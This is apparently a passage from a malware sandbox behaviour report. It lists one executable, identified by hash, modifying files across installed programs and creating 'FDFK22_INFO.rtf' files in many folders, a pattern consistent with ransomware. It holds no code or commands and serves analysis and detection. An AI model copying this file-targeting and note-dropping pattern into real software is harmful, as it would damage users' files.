a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rainy_River a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\te.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST7MDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Whitehorse a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\JoinStop.js a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Oslo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\gmail.crx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EET a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Amman a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\klist.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program 